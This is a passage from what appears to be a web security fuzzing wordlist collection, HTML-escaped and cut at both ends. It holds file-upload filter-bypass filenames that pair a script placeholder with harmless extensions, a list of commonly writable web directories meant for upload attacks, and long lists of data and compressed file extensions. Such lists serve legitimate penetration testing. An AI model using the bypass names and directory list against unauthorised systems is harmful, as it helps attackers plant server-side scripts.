{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
